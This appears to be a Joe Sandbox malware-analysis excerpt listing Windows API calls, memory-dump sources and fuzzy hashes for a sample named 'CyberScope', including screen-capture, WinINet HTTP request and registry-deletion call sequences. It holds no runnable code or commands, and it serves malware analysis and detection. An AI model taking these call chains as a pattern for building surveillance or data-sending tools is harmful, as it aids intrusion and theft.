                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002278CC
                                                                                    • DestroyWindow.USER32(?), ref: 002278ED
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00190000,00000000), ref: 0022791C
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00227935
                                                                                    • GetDesktopWindow.USER32 ref: 0022794E
                                                                                    • GetWindowRect.USER32(00000000), ref: 00227955
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0022796D
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00227985
                                                                                      • Part of subcall function 00192234: GetWindowLongW.USER32(?,000000EB), ref: 00192242
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 2429346358-3619404913
                                                                                    • Opcode ID: 3de8a2fda692fc40589f5cb316a61eb3647126554b44318fd2e6face54729348
                                                                                    • Instruction ID: 34a6efd20d672bb13d7bab22e709649fd6d8e9523a55a1fa8d70c4edd1782d9f
                                                                                    • Opcode Fuzzy Hash: 3de8a2fda692fc40589f5cb316a61eb3647126554b44318fd2e6face54729348
                                                                                    • Instruction Fuzzy Hash: DA71A970509345AFD721CF98EC48F6ABBF9FB8A300F54441DF98587261C7B0A95ADB12
                                                                                    APIs
                                                                                      • Part of subcall function 00191802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00191488,?,00000000,?,?,?,?,0019145A,00000000,?), ref: 00191865
                                                                                    • DestroyWindow.USER32(?), ref: 00191521
                                                                                    • KillTimer.USER32(00000000,?,?,?,?,0019145A,00000000,?), ref: 001915BB
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 001D29B4
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,0019145A,00000000,?), ref: 001D29E2
                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,0019145A,00000000,?), ref: 001D29F9
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0019145A,00000000), ref: 001D2A15
                                                                                    • DeleteObject.GDI32(00000000), ref: 001D2A27
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID: <)&
                                                                                    • API String ID: 641708696-1148968944
                                                                                    • Opcode ID: 2b0de8a1acb23a398c976b1ec5d68a97a1b68604394857f0206abfda0d2d7e2a
                                                                                    • Instruction ID: d1b641684ecbd99cd02e273399954f7372dbeb8c1ec28b720abd894deb68eaf5
                                                                                    • Opcode Fuzzy Hash: 2b0de8a1acb23a398c976b1ec5d68a97a1b68604394857f0206abfda0d2d7e2a
                                                                                    • Instruction Fuzzy Hash: 0C618B31502B12EFDB399F14E94CB2AB7B1FB91312F629119E0429BA70C7B4A8D5DF40
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0020CEF5
                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0020CF08
                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0020CF1C
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0020CF35
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0020CF78
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0020CF8E
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0020CF99
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0020CFC9
                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0020D021
                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0020D035
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0020D040
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 3800310941-3916222277
                                                                                    • Opcode ID: 8b7238dbd68cdac78d9bf529a8226dc97eebc54232a350f56afa09988515223a
                                                                                    • Instruction ID: 93f2e5f8c331cf352733a0cf060866c76544ee549de374c0945d8da52b1bef25
                                                                                    • Opcode Fuzzy Hash: 8b7238dbd68cdac78d9bf529a8226dc97eebc54232a350f56afa09988515223a
                                                                                    • Instruction Fuzzy Hash: C451BFB1511705BFDB218FA0DC88ABBBBBDFF08344F10451AF94586192D734D916ABA0
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002266D6,?,?), ref: 00228FEE
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002266D6,?,?,00000000,?), ref: 00228FFE
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002266D6,?,?,00000000,?), ref: 00229009
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002266D6,?,?,00000000,?), ref: 00229016
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00229024
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002266D6,?,?,00000000,?), ref: 00229033
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0022903C
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002266D6,?,?,00000000,?), ref: 00229043
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002266D6,?,?,00000000,?), ref: 00229054
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00230C04,?), ref: 0022906D
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0022907D
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0022909D
                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002290CD
                                                                                    • DeleteObject.GDI32(00000000), ref: 002290F5
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0022910B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 919d9fd7ba3fecdc7f2953745a04fa987a79e543a4c49eb3a6495ace5e211b71
                                                                                    • Instruction ID: 265fc6bd5c2cd77b0599b9c6eb1c4fa197ec61bda20218d0a2098787ebe4f83d
                                                                                    • Opcode Fuzzy Hash: 919d9fd7ba3fecdc7f2953745a04fa987a79e543a4c49eb3a6495ace5e211b71
                                                                                    • Instruction Fuzzy Hash: 15413775600219FFDB219FA5EC8CEAA7BB8EF89711F104059F909D7260D770AA52DB20
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                      • Part of subcall function 0021D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0021C10E,?,?), ref: 0021D415
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D451
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4C8
                                                                                      • Part of subcall function 0021D3F8: _wcslen.LIBCMT ref: 0021D4FE
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0021C154
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0021C1D2
                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 0021C26A
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0021C2DE
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0021C2FC
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0021C352
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0021C364
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0021C382
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0021C3E3
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0021C3F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 146587525-4033151799
                                                                                    • Opcode ID: 21ad2b7f36d732b097464543bd81190129fd894ba0585f6590d3471b784a415d
                                                                                    • Instruction ID: 3d2c9b14d117e9916fb304ba65d9526a8b97447fec76d875bbdb65d334ec3051
                                                                                    • Opcode Fuzzy Hash: 21ad2b7f36d732b097464543bd81190129fd894ba0585f6590d3471b784a415d
                                                                                    • Instruction Fuzzy Hash: 7CC19234218242EFD720DF54C495F6ABBE1BF54314F24849CF46A8B2A2CB71ED96CB91
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0022A990
                                                                                    • GetSystemMetrics.USER32(00000011), ref: 0022A9A7
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0022A9B3
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0022A9C9
                                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0022AC15
                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0022AC33
                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0022AC54
                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0022AC73
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0022AC95
                                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 0022ACBB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                    • String ID: @$(&
                                                                                    • API String ID: 3962739598-3893994993
                                                                                    • Opcode ID: 26cc5b737db4cbf6cd413bd6d7ab7ae7496edcc93020242726c3e9aa854e40ef
                                                                                    • Instruction ID: 0fbee6b6424b00d801a1c0ab0c64c0d4e44f336a2a3c0ff2fdc7f05b5b260671
                                                                                    • Opcode Fuzzy Hash: 26cc5b737db4cbf6cd413bd6d7ab7ae7496edcc93020242726c3e9aa854e40ef
                                                                                    • Instruction Fuzzy Hash: C8B1CF3060022AEFDF14CFA8D9887AE7BF2FF44704F14806AEC459B695D774A9A0CB51
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002297B6
                                                                                    • GetFocus.USER32 ref: 002297C6
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 002297D1
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00229879
                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0022992B
                                                                                    • GetMenuItemCount.USER32(?), ref: 00229948
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00229958
                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0022998A
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002299CC
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002299FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                    • String ID: 0$(&
                                                                                    • API String ID: 1026556194-74544602
                                                                                    • Opcode ID: cefade631f332643c9160790e54b870479b26d4b03d0354e409df76fda48098f
                                                                                    • Instruction ID: c90082683da23bfb0dcc4e49a0c8f7418589f9431e26598d775e61e98a1dc8b5
                                                                                    • Opcode Fuzzy Hash: cefade631f332643c9160790e54b870479b26d4b03d0354e409df76fda48098f
                                                                                    • Instruction Fuzzy Hash: D9810770514322BFD720CF94E884AAB77E8FF88314F04051DF98597291DB70D995CBA2
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00213035
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00213045
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00213051
                                                                                    • SelectObject.GDI32(00000000,?), ref: 0021305E
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 002130CA
                                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00213109
                                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0021312D
                                                                                    • SelectObject.GDI32(?,?), ref: 00213135
                                                                                    • DeleteObject.GDI32(?), ref: 0021313E
                                                                                    • DeleteDC.GDI32(?), ref: 00213145
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00213150
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: b4541f71b68668ed57b77aa186d3c3dcc9302cbf03b6337b03f2798a04b6fa4e
                                                                                    • Instruction ID: b84cd21c8aad93ec2353eaae7a19d4c1c240cf415fa90b4bdac414329f7ad346
                                                                                    • Opcode Fuzzy Hash: b4541f71b68668ed57b77aa186d3c3dcc9302cbf03b6337b03f2798a04b6fa4e
                                                                                    • Instruction Fuzzy Hash: B361F2B5D10219AFCB14CFE8D888AAEBBF6FF58310F208419E559A7250D771AA51CF90
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001F52E6
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001F5328
                                                                                    • _wcslen.LIBCMT ref: 001F5339
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 001F5345
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001F537A
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 001F53B2
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 001F53EB
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 001F5445
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 001F5477
                                                                                    • GetWindowRect.USER32(?,?), ref: 001F54EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                    • String ID: ThumbnailClass
                                                                                    • API String ID: 1311036022-1241985126
                                                                                    • Opcode ID: 905268759b4d2527dd99007fe28d1c2a87591b474acdf7dc975e4cf8fc283e9a
                                                                                    • Instruction ID: a89bbdfb31e6f5c60e5dd7afe6db472e5cadedae615c344bfb30b4e7add1136d
                                                                                    • Opcode Fuzzy Hash: 905268759b4d2527dd99007fe28d1c2a87591b474acdf7dc975e4cf8fc283e9a
                                                                                    • Instruction Fuzzy Hash: F891E371104B0AAFDB18DF24D994BBAB7BAFF51304F044519FB8A82091EB31ED56CB91
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(002629C0,000000FF,00000000,00000030), ref: 001FC973
                                                                                    • SetMenuItemInfoW.USER32(002629C0,00000004,00000000,00000030), ref: 001FC9A8
                                                                                    • Sleep.KERNEL32(000001F4), ref: 001FC9BA
                                                                                    • GetMenuItemCount.USER32(?), ref: 001FCA00
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 001FCA1D
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 001FCA49
                                                                                    • GetMenuItemID.USER32(?,?), ref: 001FCA90
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001FCAD6
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001FCAEB
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001FCB0C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                    • String ID: 0
                                                                                    • API String ID: 1460738036-4108050209
                                                                                    • Opcode ID: be2816bdd4d470b9bca03e3755c8ed9165e9c0c8415d34d86a956e14d13d7e0d
                                                                                    • Instruction ID: b2eb1504b1dc54265c802b5bdb2774b2d609f1c7af46938f86925d49135ff343
                                                                                    • Opcode Fuzzy Hash: be2816bdd4d470b9bca03e3755c8ed9165e9c0c8415d34d86a956e14d13d7e0d
                                                                                    • Instruction Fuzzy Hash: 6161A07090024EAFDF25CFA4DA89AFE7BB8FB45348F140055FA11A3251D770AD15EBA0
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001FE4D4
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001FE4FA
                                                                                    • _wcslen.LIBCMT ref: 001FE504
                                                                                    • _wcsstr.LIBVCRUNTIME ref: 001FE554
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001FE570
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 1939486746-1459072770
                                                                                    • Opcode ID: d7ae17bd920fe8ae9d84c6059741e3401b3aed3bcdc7197f1a63233ff8acdd18
                                                                                    • Instruction ID: 4afc48cc43b853d1ffc57d0b9a024c7fdf17243750f3da0e967b4b84a23334f6
                                                                                    • Opcode Fuzzy Hash: d7ae17bd920fe8ae9d84c6059741e3401b3aed3bcdc7197f1a63233ff8acdd18
                                                                                    • Instruction Fuzzy Hash: 4D4119729443187BDB15ABB4AC47EFF77ACEF65720F100025FA00E60A2FB74DA1192A5
                                                                                    APIs
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0021D6C4
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0021D6ED
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0021D7A8
                                                                                      • Part of subcall function 0021D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0021D70A
                                                                                      • Part of subcall function 0021D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0021D71D
                                                                                      • Part of subcall function 0021D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0021D72F
                                                                                      • Part of subcall function 0021D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0021D765
                                                                                      • Part of subcall function 0021D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0021D788
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0021D753
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2734957052-4033151799
